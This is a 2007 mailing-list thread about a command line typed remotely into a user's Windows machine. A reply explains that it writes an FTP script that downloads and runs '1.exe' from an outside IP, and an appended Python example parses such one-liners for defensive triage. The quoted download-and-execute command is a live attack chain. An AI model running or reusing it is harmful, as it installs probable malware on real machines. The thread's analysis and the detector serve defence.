
Re: spooky windows script



hi,

> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit

to clarify what this command line does:

it writes the following text lines in a file called "ik":

open 59.31.153.120 22783
user db database
get 1.exe
bye

these are FTP commands, which are now being executed by the windows FTP
client. the parameters -n -v suppress user autologin and verboseness
and the parameter -s:ik executes the content of the file "ik" as FTP
commands. the file ftp://db:database@59.31.153.120:22783/1.exe is being
fetched, the file "ik" is then being deleted and finally the file
"1.exe" is being executed. i suppose that 1.exe is some kind of windows
trojan or virus.

cheers,
-stephan loh
 

On 2007.05.08 15:39, Celejar wrote:
> On Tue,  8 May 2007 14:57:24 +0200 (CEST)
> Jan Outhuis <jan.outhuis@orange.nl> wrote:
> 
> > Hello,
> > 
> > Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed:
> > 
> > %systemroot%\system32\cmd.exe
> > cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
> > 
> > (I see on my network monitor that this is coming from outside; IP-number and user name vary.)
> > 
> > After that all is back to normal.
> > 
> > Now this is of course a nuisance, but is it also a threat? And what can be done against it?
> > 
> > Anybody got a clue on this?
> > 
> > Tia,
> > 
> > Jan Outhuis
> 
> Are you running linux or windows? With what program are you surfing?
> Where is that text displayed? The cmd.exe line looks like someone
> trying to open the windows command shell; the next line looks like
> someone trying to capture some data from your system and ftp it
> outwards. I'm just guessing, but it does appear to be a threat.
> 
> Celejar
> --
> mailmin.sourceforge.net - remote access via secure (OpenPGP) email
> ssuds.sourceforge.net - A Simple Sudoku Solver and Generator

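The reply above explains by hand how the echo/ftp one-liner builds a script file and fetches and runs a binary. The following added example (not from the thread or from any of its posters) does the same reconstruction programmatically, as a defender would when triaging such command lines from process or keystroke logs: it splits the cmd.exe `&` chain, collects the `echo ... >> file` lines that feed `ftp -s:file`, parses the resulting FTP script into host, port, credentials and fetched files, and notes whether a fetched file is executed afterwards. The sample command line is the one quoted in the thread; the `FtpDropper` structure and `analyze_cmdline` function are this example's own names.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the cmd.exe one-liner quoted in the thread.
SAMPLE = ("cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik "
          "&echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit")

@dataclass
class FtpDropper:
    script_file: str                       # the "ik" file the echo lines build
    script: list = field(default_factory=list)
    host: str = ""
    port: int = 21                         # FTP default if "open" gives no port
    user: str = ""
    password: str = ""
    fetched: list = field(default_factory=list)
    executed: list = field(default_factory=list)

    def urls(self):
        cred = f"{self.user}:{self.password}@" if self.user else ""
        return [f"ftp://{cred}{self.host}:{self.port}/{f}" for f in self.fetched]

def analyze_cmdline(cmdline):
    """Reconstruct the FTP script an 'echo ... >> f & ftp -s:f' one-liner builds; None if no ftp -s: stage."""
    parts = [p.strip() for p in cmdline.split("&") if p.strip()]   # cmd.exe '&' chain
    parts[0] = re.sub(r"^\S*cmd(?:\.exe)?\s+/c\s+", "", parts[0], flags=re.I)
    ftp_idx = next((i for i, p in enumerate(parts)
                    if re.match(r"ftp(?:\.exe)?\b.*-s:\S+", p, re.I)), None)
    if ftp_idx is None:
        return None
    d = FtpDropper(script_file=re.search(r"-s:(\S+)", parts[ftp_idx], re.I).group(1))
    for p in parts[:ftp_idx]:              # collect the echo lines redirected into it
        m = re.match(r"echo\s+(.*?)\s*>>\s*(\S+)$", p, re.I)
        if m and m.group(2).lower() == d.script_file.lower():
            d.script.append(m.group(1))
    for line in d.script:                  # interpret the reconstructed FTP script
        tok = line.split()
        verb = tok[0].lower() if tok else ""
        if verb == "open" and len(tok) >= 2:
            d.host = tok[1]
            d.port = int(tok[2]) if len(tok) >= 3 and tok[2].isdigit() else d.port
        elif verb == "user" and len(tok) >= 2:
            d.user, d.password = tok[1], (tok[2] if len(tok) >= 3 else "")
        elif verb in ("get", "mget") and len(tok) >= 2:
            d.fetched.extend(tok[1:])
    for p in parts[ftp_idx + 1:]:          # a fetched file invoked after the ftp stage
        tok = p.split()
        if tok and tok[0].lower() in [f.lower() for f in d.fetched]:
            d.executed.append(tok[0])
    return d
```

Running `analyze_cmdline(SAMPLE)` yields the same `ftp://db:database@59.31.153.120:22783/1.exe` that the reply derived by hand, plus `executed == ["1.exe"]`, which is the download-and-execute signal worth alerting on.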